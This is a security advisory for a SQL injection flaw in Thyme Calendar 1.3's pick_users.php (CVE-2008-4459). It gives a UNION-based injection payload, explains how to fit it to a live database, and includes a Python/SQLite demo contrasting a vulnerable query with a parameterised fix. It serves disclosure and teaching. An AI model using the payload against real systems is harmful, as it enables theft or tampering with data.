eXtrovert software Thyme 'pick_users.php' SQL Injection Vulnerability
BID:31063
Info
| Bugtraq ID: | 31063 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-4459 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 08 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Omer Singer |
| Vulnerable: | EXtrovert Software Thyme Calendar 1.3 |
| Not Vulnerable: | |
Discussion
eXtrovert software Thyme is prone to an SQL-injection vulnerability because the 'pick_users.php' script fails to sufficiently sanitize user-supplied data before using it in an SQL query. A single quote in the submitted value terminates the string literal and the remainder of the input is parsed as SQL.
Exploiting this issue could allow a remote attacker to read or modify data in the application's database, including tables the application itself never exposes, or to exploit latent vulnerabilities in the underlying database server.
Thyme 1.3 is affected; other versions may also be vulnerable.
Exploit / POC
Attackers can use a browser to exploit this issue; no authentication or special tooling is described.
The following proof of concept is available:
Submit the following to the input field at /thyme/modules/groups/pick_users.php:
' union all select proof,of,concept from mysql.db/*
The leading quote closes the string literal the script builds around the input, UNION ALL appends attacker-chosen rows to the script's own result set, and the trailing /* opens a MySQL comment that swallows the rest of the original query (including its closing quote). The three selected names are placeholders: a working payload must select exactly as many columns as the original query does, and name columns that exist in the target table (or use literals). mysql.db is the MySQL privilege table, so this particular target also assumes the application's database account can read the mysql schema.
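The following is an added, self-contained example that is not part of the advisory and not Thyme's code. It models a hypothetical user lookup of the shape the PoC implies (a query returning three columns, with the search string spliced into the SQL text), runs the same payload pattern against it in an in-memory SQLite database (a hypothetical secrets table stands in for mysql.db, since SQLite has no mysql schema), and contrasts it with a parameterised query. It also shows why the payload's column count matters: a UNION with a different number of columns is rejected by the database.

```python
import sqlite3

# Constructed sample data: the application's user table and an unrelated table
# the attacker wants to read (a hypothetical "secrets" table standing in for
# mysql.db in the advisory's PoC).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.org');
        INSERT INTO users VALUES (2, 'bob', 'bob@example.org');
        CREATE TABLE secrets(id INTEGER, secret TEXT, owner TEXT);
        INSERT INTO secrets VALUES (1, 's3cret-token', 'admin');
    """)
    return conn

# Hypothetical lookup built the unsafe way: the search string is concatenated
# into the SQL text, so a quote in the input ends the literal and everything
# after it is parsed as SQL.
def pick_users_vulnerable(conn, name):
    sql = "SELECT id, name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

# The same lookup with a bound parameter: the input is only ever a value,
# never part of the statement text.
def pick_users_safe(conn, name):
    sql = "SELECT id, name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()

# Same shape as the advisory's payload: close the string, UNION ALL a SELECT
# with the same column count (three here), and open a block comment so the
# original query's trailing quote is discarded by the parser.
PAYLOAD = "' union all select id, secret, owner from secrets/*"

# Two columns instead of three: the database refuses the UNION, which is why
# the attacker has to match the original query's column count.
MISMATCHED_PAYLOAD = "' union all select id, secret from secrets/*"

def demo():
    conn = make_db()
    leaked = pick_users_vulnerable(conn, PAYLOAD)   # rows from "secrets"
    safe = pick_users_safe(conn, PAYLOAD)           # no rows: no user is named that
    try:
        pick_users_vulnerable(conn, MISMATCHED_PAYLOAD)
        mismatch_error = None
    except sqlite3.OperationalError as e:
        mismatch_error = str(e)
    return leaked, safe, mismatch_error

if __name__ == "__main__":
    leaked, safe, err = demo()
    print("vulnerable query returned:", leaked)
    print("parameterised query returned:", safe)
    print("two-column union rejected with:", err)
```

MySQL treats an unterminated /* the same way SQLite does here (the comment runs to the end of the statement), so the mechanics carry over; only the target table and column names differ.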
Solution / Fix
Solution:
Reports indicate that the vendor has released an update to address this issue. Symantec has not confirmed this. Please see the references for more information. Until a fixed release is verified, the underlying defect is the unescaped use of the input in the query built by pick_users.php; binding the value as a query parameter (or escaping it for the database in use) removes the injection regardless of the version installed.
References
References:
- The DigiTrust Group: Advisory #080908a - Thyme SQL Injection Vulnerability (Omer Singer)
- Thyme Homepage (EXtrovert Software)